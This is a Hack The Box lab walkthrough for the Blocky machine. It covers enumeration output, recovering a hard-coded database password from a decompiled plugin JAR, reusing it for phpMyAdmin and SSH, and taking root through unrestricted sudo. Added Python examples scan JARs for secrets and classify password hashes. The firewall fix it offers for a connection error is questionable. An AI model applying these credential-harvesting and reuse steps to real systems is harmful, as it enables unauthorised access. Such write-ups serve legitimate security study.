Blocky HTB Walkthrough

This machine is an OSCP-like machine and an OSWE prep machine.

Overview: open TCP ports FTP (21), SSH (22), HTTP (80), Minecraft (25565); Apache httpd 2.4.18; WordPress 4.8; Ubuntu 4ubuntu2.2 (Linux).

Add blocky.htb to the /etc/hosts file.

Recon

Port scan (nmap)

// nmap -T4 -A -p- 10.10.10.37

Based on the OpenSSH and Apache versions, the host is likely running Ubuntu 16.04 Xenial. There’s also something interesting going on with TCP 25565, as it’s reporting closed.

Apache package versions: https://packages.ubuntu.com/search?keywords=apache2

OpenSSH package versions: https://packages.ubuntu.com/search?keywords=openssh-server

Nikto Scan

// nikto -host 10.10.10.37

Website - TCP 80

Visit web page 10.10.10.37:80

The site is WordPress (the footer reads "Proudly powered by WordPress"), and its post describes a wiki hosted on the server. From that post I note the user account name notch and the login page.

The default login admin:admin does not work.

WPScan

WPScan finds no plugins, but it does confirm the notch user I noted earlier on the site.

┌──(root💀kali)-[~/Desktop/htb/blocky]
└─# wpscan --url http://10.10.10.37 -e ap,t,tt,u 
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.19
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.10.37/ [10.10.10.37]
[+] Started: Sun Nov 21 03:10:43 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.10.37/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.10.10.37/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.37/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
| Found By: Rss Generator (Passive Detection)
| - http://10.10.10.37/index.php/feed/, <generator>https://wordpress.org/?v=4.8</generator>
| - http://10.10.10.37/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Most Popular Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:02:32 <======================================================================================> (400 / 400) 100.00% Time: 00:02:32
[+] Checking Theme Versions (via Passive and Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen
| Location: http://10.10.10.37/wp-content/themes/twentyfifteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.0
| Style URL: http://10.10.10.37/wp-content/themes/twentyfifteen/style.css
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/, status: 500
|
| Version: 1.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyfifteen/style.css, Match: 'Version: 1.8'
[+] twentyseventeen
| Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
| [!] The version is out of date, the latest version is 2.8
| Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Urls In Homepage (Passive Detection)
| Confirmed By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css, Match: 'Version: 1.3'
[+] twentysixteen
| Location: http://10.10.10.37/wp-content/themes/twentysixteen/
| Last Updated: 2021-07-22T00:00:00.000Z
| Readme: http://10.10.10.37/wp-content/themes/twentysixteen/readme.txt
| [!] The version is out of date, the latest version is 2.5
| Style URL: http://10.10.10.37/wp-content/themes/twentysixteen/style.css
| Style Name: Twenty Sixteen
| Style URI: https://wordpress.org/themes/twentysixteen/
| Description: Twenty Sixteen is a modernized take on an ever-popular WordPress layout — the horizontal masthead ...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/, status: 500
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.10.37/wp-content/themes/twentysixteen/style.css, Match: 'Version: 1.3'
[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:04:42 <====================================================================================> (2575 / 2575) 100.00% Time: 00:04:42
[i] No Timthumbs Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <========================================================================================> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Nov 21 03:18:20 2021
[+] Requests Done: 3050
[+] Cached Requests: 19
[+] Data Sent: 825.099 KB
[+] Data Received: 18.245 MB
[+] Memory used: 264.414 MB
[+] Elapsed time: 00:07:37

Directory Brute Force (Run Gobuster and include PHP)

┌──(root💀kali)-[~/Desktop/htb/blocky]
└─# gobuster dir -u blocky.htb -w /usr/share/wordlists/dirb/common.txt -x php -t 40
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://blocky.htb
[+] Method:                  GET
[+] Threads:                 40
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/11/21 03:05:20 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 294]
/.htaccess.php        (Status: 403) [Size: 298]
/.hta                 (Status: 403) [Size: 289]
/.htpasswd            (Status: 403) [Size: 294]
/.htpasswd.php        (Status: 403) [Size: 298]
/.hta.php             (Status: 403) [Size: 293]
/index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]
/index.php            (Status: 301) [Size: 0] [--> http://blocky.htb/]
/javascript           (Status: 301) [Size: 313] [--> http://blocky.htb/javascript/]
/phpmyadmin           (Status: 301) [Size: 313] [--> http://blocky.htb/phpmyadmin/]
/plugins              (Status: 301) [Size: 310] [--> http://blocky.htb/plugins/]
/server-status        (Status: 403) [Size: 298]
/wiki                 (Status: 301) [Size: 307] [--> http://blocky.htb/wiki/]
/wp-content           (Status: 301) [Size: 313] [--> http://blocky.htb/wp-content/]
/wp-includes          (Status: 301) [Size: 314] [--> http://blocky.htb/wp-includes/]
/wp-login.php         (Status: 200) [Size: 2402]
/wp-admin             (Status: 301) [Size: 311] [--> http://blocky.htb/wp-admin/]
/wp-blog-header.php   (Status: 200) [Size: 0]
/wp-config.php        (Status: 200) [Size: 0]
/wp-cron.php          (Status: 200) [Size: 0]
/wp-load.php          (Status: 200) [Size: 0]
/wp-links-opml.php    (Status: 200) [Size: 219]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-mail.php          (Status: 403) [Size: 3444]
/wp-settings.php      (Status: 500) [Size: 0]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://10.10.10.37/wp-login.php?action=register]
/xmlrpc.php           (Status: 405) [Size: 42]
/xmlrpc.php           (Status: 405) [Size: 42]
===============================================================
2021/11/21 03:06:30 Finished
===============================================================

From that list, I'll check out /wiki, /plugins, and /phpmyadmin.

Visit http://10.10.10.37/wiki

Visit http://10.10.10.37/phpmyadmin

The default login admin:admin does not work here either.

Visit http://10.10.10.37/plugins

I find two .jar files (BlockyCore.jar and griefprevention-1.11.2-3.1.1.298.jar) and download them to my host machine.

A JAR is a package file format typically used to aggregate many Java class files and associated metadata and resources into one file for distribution. JAR files are archive files that include a Java-specific manifest file. They are built on the ZIP format and typically have a .jar file extension.

Shell as notch

Reverse Jars

I use JD-GUI to decompile the JAR files. JD-GUI is a standalone graphical utility that displays the Java source code of ".class" files. You can browse the reconstructed source code in JD-GUI for instant access to methods and fields.

jd-gui:

How to install: sudo apt install jd-gui

More details: https://www.kali.org/tools/jd-gui/

After installation, I launch jd-gui with the command "jd-gui" and open each JAR file in turn. I find the root login details in BlockyCore.class.

public class BlockyCore {
    public String sqlHost = "localhost";
    public String sqlUser = "root";
    public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
    // ...
}
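The credentials were recoverable because of the JAR format described above: a JAR is a ZIP archive, and every string literal a class uses is stored verbatim in that class file's constant pool, so a plugin published in a web-accessible directory leaks whatever its developer hard-coded. As an added example (not code from the walkthrough or the Blocky plugin), this Python scanner flags credential-like literals in a JAR; the JAR, the class layout and the secret value it finds are constructed here.

```python
# Added example: read a JAR as a ZIP, parse each .class constant pool and report
# CONSTANT_String literals that look like credentials. Sample JAR is constructed.
import io
import re
import struct
import zipfile
# Payload size in bytes of every fixed-size constant-pool tag (JVM spec section 4.4).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
# Credential heuristic: 16+ alphanumerics mixing lower case, upper case and digits.
SECRET_RE = re.compile(r"(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[A-Za-z0-9]{16,}")

def class_string_literals(data: bytes) -> list:
    """Return the CONSTANT_String literals of one .class file, in pool order."""
    assert data[:4] == b"\xca\xfe\xba\xbe", "not a class file"
    count = struct.unpack(">H", data[8:10])[0]          # constant_pool_count
    pos, idx, utf8, refs = 10, 1, {}, []
    while idx < count:
        tag, pos = data[pos], pos + 1
        if tag == 1:                                    # CONSTANT_Utf8: u2 length + bytes
            n = struct.unpack(">H", data[pos:pos + 2])[0]
            utf8[idx] = data[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        else:
            if tag == 8:                                # CONSTANT_String: u2 Utf8 index
                refs.append(struct.unpack(">H", data[pos:pos + 2])[0])
            pos += FIXED[tag]
        idx += 2 if tag in (5, 6) else 1                # Long/Double occupy two slots
    return [utf8[i] for i in refs]

def scan_jar(jar_bytes: bytes) -> dict:
    """Map each .class in the JAR to its credential-looking literals (empty ones dropped)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        hits = {n: [s for s in class_string_literals(jar.read(n)) if SECRET_RE.fullmatch(s)]
                for n in jar.namelist() if n.endswith(".class")}
    return {n: v for n, v in hits.items() if v}

def build_sample_class() -> bytes:
    """Constructed minimal class: header plus a constant pool shaped like BlockyCore's."""
    utf8 = lambda s: b"\x01" + struct.pack(">H", len(s)) + s.encode()
    pool = [utf8("sqlPass"), utf8("Xy9PlaceholderSecret42"), b"\x08\x00\x02",   # slots 1-3
            utf8("localhost"), b"\x08\x00\x04", utf8("BlockyCore"), b"\x07\x00\x06",  # 4-7
            b"\x05" + bytes(8)]                                                   # 8-9: Long
    return b"\xca\xfe\xba\xbe\x00\x00\x00\x34" + struct.pack(">H", 10) + b"".join(pool)

def build_sample_jar() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:             # manifest + class, like a real JAR
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("com/example/BlockyCore.class", build_sample_class())
    return buf.getvalue()
```

Running scan_jar over a build artifact before it is deployed is the cheap check that would have caught this; the placeholder value stands in for the real sqlPass.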

I try to log in to phpMyAdmin with root:8YsqfCTnvxAUeduzjNSXe22, and the login succeeds.

I check wp_users and find the user notch's record as follows.

SELECT * FROM `wp_users`

I use "hash-identifier" to identify the likely type of the hash "BiVoTj899ItS1EZnMhqeqVbrZI4Oq0/". Hash-identifier is a tool that identifies the hash type of a given value, especially stored passwords. More information: https://www.kali.org/tools/hash-identifier/

How to install:

apt install hash-identifier

I launch hash-identifier with the following command

hash-identifier

hash-identifier reports that the hash is most likely an MD5 (WordPress) hash.
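hash-identifier guesses from length and alphabet; the hash's own structure says more, and that matters when deciding how an application stores passwords. As an added example (not the walkthrough's code), this Python identifier parses the hash format directly, assuming the value above carries the "$P$" prefix that WordPress 4.8 phpass hashes have, and includes a small wp_users-style audit helper; it also recognizes bcrypt, sha-crypt and raw MD5-length digests, which goes beyond the single hash on the page.

```python
# Added example: identify a password hash from its structure rather than a guess.
# The WordPress (phpass) hash is assumed to carry its "$P$" prefix.
import re

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def identify_hash(h: str) -> dict:
    """Return the scheme plus the parameters an auditor cares about."""
    # phpass ($P$ WordPress, $H$ phpBB): cost char, 8-char salt, 22-char MD5 chain
    m = re.fullmatch(r"\$[PH]\$([./0-9A-Za-z])([./0-9A-Za-z]{8})[./0-9A-Za-z]{22}", h)
    if m:
        log2 = ITOA64.index(m.group(1))          # 'B' -> 13 -> 2**13 MD5 rounds
        return {"scheme": "phpass-md5", "salt": m.group(2), "iterations": 1 << log2,
                "weak": True}                    # MD5-based; migrate to bcrypt/argon2
    m = re.fullmatch(r"\$2[aby]\$(\d{2})\$[./0-9A-Za-z]{53}", h)
    if m:
        cost = int(m.group(1))
        return {"scheme": "bcrypt", "cost": cost, "weak": cost < 10}
    m = re.fullmatch(r"\$(5|6)\$(?:rounds=(\d+)\$)?([^$]{1,16})\$[./0-9A-Za-z]{43,86}", h)
    if m:
        return {"scheme": "sha256crypt" if m.group(1) == "5" else "sha512crypt",
                "salt": m.group(3), "rounds": int(m.group(2) or 5000), "weak": False}
    if re.fullmatch(r"[0-9a-f]{32}", h, re.I):   # unsalted 128-bit digest, e.g. raw MD5
        return {"scheme": "raw-md5-length digest (unsalted)", "weak": True}
    return {"scheme": "unknown", "weak": None}

def audit_wp_users(rows: list) -> list:
    """Flag (user_login, scheme) pairs whose stored hash is weak; rows mimic wp_users."""
    return [(login, identify_hash(pw)["scheme"]) for login, pw in rows
            if identify_hash(pw)["weak"]]
```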

Exploitation (SSH, port 22)

I use SSH to log in as the root or notch account.

The SSH protocol (also referred to as Secure Shell) is a method for secure remote login from one computer to another. It provides several alternative options for strong authentication, and it protects the communications security and integrity with strong encryption. It is a secure alternative to the non-protected login protocols (such as telnet, rlogin) and insecure file transfer methods (such as FTP).

More details : https://www.ssh.com/ssh/protocol/

I have two user accounts (notch and root) and one password, 8YsqfCTnvxAUeduzjNSXe22. I use ssh to log in as notch with the following command.

sshpass -p 8YsqfCTnvxAUeduzjNSXe22 ssh notch@10.10.10.37
or
ssh notch@10.10.10.37

User notch

I try to log in as notch with ssh but get the error "ssh: connect to host 10.10.10.37 port 22: No route to host". I google this error and find a fix at https://www.tecmint.com/fix-no-route-to-host-ssh-error-in-linux/

firewall-cmd --permanent --add-port=22/tcp
firewall-cmd --reload
OR
sudo ufw allow 22/tcp
sudo ufw reload

I choose ufw and get another error, "zsh: command not found: ufw", so I have to install ufw first with "apt install -y ufw". Details: https://www.hiroom2.com/2017/07/20/kalilinux-2017-1-ufw-en

Login with sshpass

sshpass is a utility for running ssh with "keyboard-interactive" password authentication, but in non-interactive mode. ssh uses direct TTY access to make sure that the password really comes from an interactive keyboard user; sshpass runs ssh in a dedicated tty, so ssh believes it is getting the password from an interactive user. More information:

https://www.cyberciti.biz/faq/noninteractive-shell-script-ssh-password-provider/

How to install sshpass in Kali:

apt-get install sshpass

Privilege Escalation

notch -> root

I run "sudo -l" to list notch's sudo rights and then "sudo su -" to get root. The sudo password is the same as notch's.

Sudo is a program for Unix-like computer operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for "superuser do" as the older versions of sudo were designed to run commands only as the superuser.

More information link:https://en.wikipedia.org/wiki/Sudo

"sudo -l" shows that notch has unrestricted sudo rights and can run any command on the system, so I get root with "sudo su -".

Thanks for reading. This is my 41st pwned machine on Hack The Box. I will try harder to go beyond OSCP so that I can pass OSCP successfully.
